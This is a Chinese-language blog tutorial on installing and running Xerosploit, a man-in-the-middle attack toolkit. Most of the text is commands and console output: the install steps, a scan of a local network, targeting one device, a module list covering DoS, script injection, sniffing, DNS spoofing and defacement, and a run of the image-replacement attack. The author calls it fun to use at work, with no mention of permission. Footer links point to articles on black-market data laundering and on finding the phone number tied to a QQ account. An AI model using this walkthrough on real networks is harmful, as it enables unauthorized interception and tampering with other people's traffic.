中间人攻击工具(Xerosploit)

简介

Xerosploit是一个渗透测试工具包,它的目的是实现中间人攻击。它附带着各种有效的攻击模块,并且还允许执行拒绝服务攻击和端口扫描

安装

  • 下载
    git clone https://github.com/LionSec/xerosploit.git
  • 安装
    cd xerosploit && sudo python install.py
    root@7c81645eb6d8:~# cd xerosploit && sudo python install.py ┌══════════════════════════════════════════════════════════════┐
    █                                                              █
    █                     Xerosploit Installer                     █
    █                                                              █
    └══════════════════════════════════════════════════════════════┘     
    [++] Please choose your operating system.
    1) Ubuntu / Kali linux / Others
    2) Parrot OS
    >>> 1

输入对应的系统就可以自动安装了
Xerosploit has been sucessfuly instaled. Execute 'xerosploit' in your terminal.
显示这个表示安装成功

使用

输入
xerosploit
打开工具

██╗  ██╗███████╗██████╗  ██████╗ ███████╗██████╗ ██╗      ██████╗ ██╗████████╗
╚██╗██╔╝██╔════╝██╔══██╗██╔═══██╗██╔════╝██╔══██╗██║     ██╔═══██╗██║╚══██╔══╝
 ╚███╔╝ █████╗  ██████╔╝██║   ██║███████╗██████╔╝██║     ██║   ██║██║   ██║   
 ██╔██╗ ██╔══╝  ██╔══██╗██║   ██║╚════██║██╔═══╝ ██║     ██║   ██║██║   ██║   
██╔╝ ██╗███████╗██║  ██║╚██████╔╝███████║██║     ███████╗╚██████╔╝██║   ██║   
╚═╝  ╚═╝╚══════╝╚═╝  ╚═╝ ╚═════╝ ╚══════╝╚═╝     ╚══════╝ ╚═════╝ ╚═╝   ╚═╝                                                      


[+]═══════════[ Author : @LionSec1 _-\|/-_ Website: lionsec.net ]═══════════[+]

                      [ Powered by Bettercap and Nmap ]

┌═════════════════════════════════════════════════════════════════════════════┐
█                                                                             █
█                         Your Network Configuration                          █ 
█                                                                             █
└═════════════════════════════════════════════════════════════════════════════┘     

╒══════════════╤═══════════════════╤═══════════╤═════════╤════════════╕
│  IP Address  │    MAC Address    │  Gateway  │  Iface  │  Hostname  │
╞══════════════╪═══════════════════╪═══════════╪═════════╪════════════╡
│              │                   │           │         │            │
├──────────────┼───────────────────┼───────────┼─────────┼────────────┤
│   1.1.1.11   │ 08:00:27:7B:3D:E7 │  1.1.1.1  │  eth0   │    kali    │
╘══════════════╧═══════════════════╧═══════════╧═════════╧════════════╛

╔═════════════╦════════════════════════════════════════════════════════════════════╗
║             ║ XeroSploit is a penetration testing toolkit whose goal is to       ║
║ Information ║ perform man in the middle attacks for testing purposes.            ║
║             ║ It brings various modules that allow to realise efficient attacks. ║
║             ║ This tool is Powered by Bettercap and Nmap.                        ║
╚═════════════╩════════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮

如果你要实现中间人攻击,比如你要让受害者访问的网站的图片全部变为固定的一张照片,你可以这样做
输入help查看下菜单选项

Xero ➮ help ╔══════════╦════════════════════════════════════════════════════════════════╗
║          ║                                                                ║
║          ║ scan     :  Map your network.                                  ║
║          ║                                                                ║
║          ║ iface    :  Manually set your network interface.               ║
║ COMMANDS ║                                                                ║
║          ║ gateway  :  Manually set your gateway.                         ║
║          ║                                                                ║
║          ║ start    :  Skip scan and directly set your target IP address. ║
║          ║                                                                ║
║          ║ rmlog    :  Delete all xerosploit logs.                        ║
║          ║                                                                ║
║          ║ help :  Display this help message.                         ║
║          ║                                                                ║
║          ║ exit :  Close Xerosploit.                                  ║
║          ║                                                                ║
╚══════════╩════════════════════════════════════════════════════════════════╝

[+] Please type 'help' to view commands.

Xero ➮

输入scan扫描一下网络

Xero ➮ scan

[++] Mapping your network ... 

[+]═══════════[ Devices found on your network ]═══════════[+]

╔════════════╦═══════════════════╦══════════════════════════════╗
║ IP Address ║ Mac Address       ║ Manufacturer                 ║
╠════════════╬═══════════════════╬══════════════════════════════╣
║ 1.1.1.1    ║ B8:F8:83:76:7E:E5 ║ (Tp-link Technologies)       ║
║ 1.1.1.2    ║ A0:8C:FD:D1:2C:C6 ║ (Hewlett Packard)            ║
║ 1.1.1.3    ║ A0:8C:FD:D2:25:B8 ║ (Hewlett Packard)            ║
║ 1.1.1.5    ║ C0:CC:F8:42:DD:D5 ║ (Apple)                      ║
║ 1.1.1.6    ║ A0:8C:FD:D1:E1:8E ║ (Hewlett Packard)            ║
║ 1.1.1.7    ║ A0:8C:FD:D5:81:DD ║ (Hewlett Packard)            ║
║ 1.1.1.9    ║ C8:6F:1D:22:37:A2 ║ (Apple)                      ║
║ 1.1.1.10   ║ 08:00:37:A1:64:05 ║ (Fuji-xerox)                 ║
║ 1.1.1.12   ║ 7C:DD:90:DE:A1:34 ║ (Shenzhen OgemrayTechnology) ║
║ 1.1.1.14   ║ B0:E2:35:43:62:43 ║ (Xiaomi Communications)      ║
║ 1.1.1.11   ║ 08:00:27:7B:3D:E7 ║ (This device)                ║
║ 1.1.1.254  ║                   ║                              ║
║            ║                   ║                              ║
╚════════════╩═══════════════════╩══════════════════════════════╝

[+] Please choose a target (e.g. 192.168.1.10). Enter 'help' for more information.

Xero ➮

扫描的信息很详细,连一些基础的设备信息都扫描出来了
接下来输入各种信息,看下面就好

Xero ➮ 1.1.1.12

[++] 1.1.1.12 has been targeted. 

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮ help ╔═════════╦══════════════════════════════════════════════════════════════════════╗
║         ║                                                                      ║
║         ║ pscan       :  Port Scanner                                          ║
║         ║                                                                      ║
║         ║ dos         :  DoS Attack                                            ║
║         ║                                                                      ║
║         ║ ping        :  Ping Request                                          ║
║         ║                                                                      ║
║         ║ injecthtml  :  Inject Html code                                      ║
║         ║                                                                      ║
║         ║ injectjs    :  Inject Javascript code                                ║
║         ║                                                                      ║
║         ║ rdownload   :  Replace files being downloaded                        ║
║         ║                                                                      ║
║         ║ sniff       :  Capturing information inside network packets          ║
║ MODULES ║                                                                      ║
║         ║ dspoof      :  Redirect all the http traffic to the specified one IP ║
║         ║                                                                      ║
║         ║ yplay       :  Play background sound in target browser               ║
║         ║                                                                      ║
║         ║ replace     :  Replace all web pages images with your own one        ║
║         ║                                                                      ║
║         ║ driftnet    :  View all images requested by your targets             ║
║         ║                                                                      ║
║         ║ move        :  Shaking Web Browser content                           ║
║         ║                                                                      ║
║         ║ deface      :  Overwrite all web pages with your HTML code           ║
║         ║                                                                      ║
╚═════════╩══════════════════════════════════════════════════════════════════════╝

[+] Which module do you want to load ? Enter 'help' for more information.

Xero»modules ➮ replace

┌══════════════════════════════════════════════════════════════┐
█                                                              █
█                          Image Replace                       █
█                                                              █
█        Replace all web pages images with your own one        █
└══════════════════════════════════════════════════════════════┘     

[+] Enter 'run' to execute the 'replace' command.

Xero»modules»replace ➮ run

[+] Insert your image path. (e.g. /home/capitansalami/pictures/fun.png)

Xero»modules»replace ➮ /root/a.png

[++] All images will be replaced by /root/a.png

[++] Press 'Ctrl + C' to stop .

效果类似下面这样



评价

在公司里还是挺好玩的,好评,各种中间人攻击的东西几乎都有

www.hackjason.com

分享本文至:

发表留言:

拦截料黑产链+洗料流程 怎么通过QQ号获取绑定的手机号(社工)
返回顶部